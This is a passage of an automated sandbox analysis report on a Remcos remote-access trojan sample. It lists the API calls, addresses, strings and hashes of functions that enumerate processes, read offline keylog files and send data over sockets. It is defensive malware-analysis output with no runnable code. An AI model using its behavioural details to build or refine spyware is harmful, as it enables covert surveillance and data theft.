                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00407EA8
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                              • Process32Next.KERNEL32(?,00000128), ref: 00407EFF
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F59
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00407F80
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F89
                              • CloseHandle.KERNEL32(?), ref: 00407F92
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F99
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FA8
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FBC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FC5
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(Program Files\,00000000), ref: 00407FDF
                              • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,?,Program Files (x86)\), ref: 00408004
                              • ??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00408015
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408029
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408037
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(?,00000025,00000001), ref: 0040804E
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040805A
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00408072
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040808B
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 0040809D
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 004080B3
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 004080BF
                              • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 004080CD
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004080D9
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 004080F7
                              • CloseHandle.KERNEL32(00000000), ref: 00408110
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408121
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040812A
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040813A
                                • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@std@@@std@@$??8std@@V?$basic_string@$D@2@@0@V12@$Process32$??0?$basic_string@??4?$basic_string@?begin@?$basic_string@?c_str@?$basic_string@CloseCreateD?$basic_ifstream@D@1@@HandleNextV01@V01@@$??0?$basic_ifstream@??2@?assign@?$basic_string@?close@?$basic_ifstream@?end@?$basic_string@?find@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?replace@?$basic_string@?seekg@?$basic_istream@?tellg@?$basic_istream@D@2@@0@0@D@2@@0@@FileFirstH@2@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@V?$fpos@W4seekdir@ios_base@2@@
                              • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                              • API String ID: 168093837-694575909
                              • Opcode ID: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                              • Instruction ID: b1c41ab4f00258a1a6098e1fdbc2013eb857e20770a4aaf06870f1c586b70205
                              • Opcode Fuzzy Hash: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                              • Instruction Fuzzy Hash: 21913E7290011AABCF14DBA0DD5DAEE7B78EF14315F1040BAF506B60A1DF785ACACB58
                              Function 0040C63F Relevance: 72.0, APIs: 40, Strings: 1, Instructions: 212networkCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,6A41AFB0), ref: 0040C652
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668,?,00000000,6A41AFB0), ref: 0040C674
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(6A41AFB0), ref: 0040C687
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C690
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,6A41AFB0), ref: 0040C6AD
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040C6BA
                              • realloc.MSVCRT ref: 0040C6C7
                              • recv.WS2_32(00000000,00000000,00001388,00000000), ref: 0040C6DA
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000,00000000,00001388,00000000), ref: 0040C6F2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C6FC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C705
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C712
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 0040C731
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C740
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C74A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C764
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C76D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00001388), ref: 0040C77E
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C79A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C7B3
                              • _itoa.MSVCRT ref: 0040C7CD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,uploadprogress,00415268,?), ref: 0040C7F0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 0040C7FA
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040C80D
                              • free.MSVCRT(00000000,00000000,00000000,00001388,00000000), ref: 0040C823
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C831
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C83A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C843
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C855
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C868
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C872
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C88C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C895
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6A3F5E04), ref: 0040C8AB
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C8B5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8BE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C8CB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8D4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8DD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8E6
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V01@V01@@$??4?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$?data@?$basic_string@?empty@?$basic_string@?length@?$basic_string@Hstd@@$??9std@@?c_str@?$basic_string@?size@?$basic_string@$?substr@?$basic_string@A?$basic_string@V10@V10@0@V10@@V12@Y?$basic_string@_itoafreereallocrecvsend
                              • String ID: uploadprogress
                              • API String ID: 1859615858-2474510805
                              • Opcode ID: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                              • Instruction ID: 86ffff36a635555f350e847bfc49deda06467b1ca712684e8777b20748256a1b
                              • Opcode Fuzzy Hash: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                              • Instruction Fuzzy Hash: 4E81FB7290011AABCF04EBA0ED9D9ED7738BF54305F1481AAF506A21A0DFB85A49CB58
                              Function 00403D9A Relevance: 70.2, APIs: 38, Strings: 2, Instructions: 221COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,6A41AFB0), ref: 00403DAF
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(offlinelogs), ref: 00403DCA
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403DFB
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403E0F
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403E1C
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403E28
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403E40
                              • ??2@YAPAXI@Z.MSVCRT ref: 00403E50
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403E63
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,00000000), ref: 00403E73
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403E7F
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403E93
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403EA9
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403EB2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00415268,?,00415268,00415650), ref: 00403EF3
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00415650), ref: 00403F00
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415650), ref: 00403F0D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F2D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F36
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F3F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FC9
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                • Part of subcall function 004021C7: closesocket.WS2_32(?), ref: 004021CC
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FE9
                                • Part of subcall function 004021D6: closesocket.WS2_32(?), ref: 004021DB
                                • Part of subcall function 004021D6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415268,00404067,?,?,?,?,?,?,?,00415268,00415650), ref: 004021E3
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F17
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00415268,00415650), ref: 0040406A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@D@std@@@std@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@?data@?$basic_string@V12@closesocket$??0?$basic_ifstream@??2@??4?$basic_string@?c_str@?$basic_string@?close@?$basic_ifstream@?empty@?$basic_string@?is_open@?$basic_ifstream@?length@?$basic_string@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@D@1@@H@2@V01@V01@@V?$fpos@W4seekdir@ios_base@2@@free
                              • String ID: autofflinelogs$offlinelogs
                              • API String ID: 1118156792-1109209412
                              • Opcode ID: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                              • Instruction ID: 7403458f184274c1abfae1a3ef7f71d8adf9ec3eca7677ca5f207d94a94b23a4
                              • Opcode Fuzzy Hash: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                              • Instruction Fuzzy Hash: 5E8142729101099BCB15EBA0EC59AEE7B7CBF55304F0440BAF506B2091EF785F89CB59
                              Function 0040E157 Relevance: 70.2, APIs: 38, Strings: 2, Instructions: 198sleepCOMMON
                              Download Yara Rule
                              APIs
                              • _EH_prolog.MSVCRT ref: 0040E15C
                              • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000), ref: 0040E18F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001A), ref: 0040E1A4
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 0040E1B6
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E1D3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E1DC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E1E5
                              • CreateDirectoryA.KERNEL32(00000000), ref: 0040E1EC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E200
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E20D
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040E235
                              • Sleep.KERNEL32(000003E8), ref: 0040E251
                              • _itoa.MSVCRT ref: 0040E273
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0041181C), ref: 0040E28A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415B08,004108CC,00000000), ref: 0040E2A2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 0040E2B2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 0040E2C2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E2CE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2DA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2E6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2F2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2FB
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,?,?,?,?,?,00000000), ref: 0040E30C
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(dat,?,?,?,?,?,?,?,?,00000000), ref: 0040E31F
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000003,?,?,?,?,?,?,?,?,00000000), ref: 0040E334
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E342
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E34E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E35A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E366
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E371
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E37B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E384
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E3A3
                                • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                                • Part of subcall function 0040DECB: mbstowcs.MSVCRT ref: 0040DEF8
                                • Part of subcall function 0040DECB: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                                • Part of subcall function 0040DECB: GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                                • Part of subcall function 0040DECB: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                                • Part of subcall function 0040DECB: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
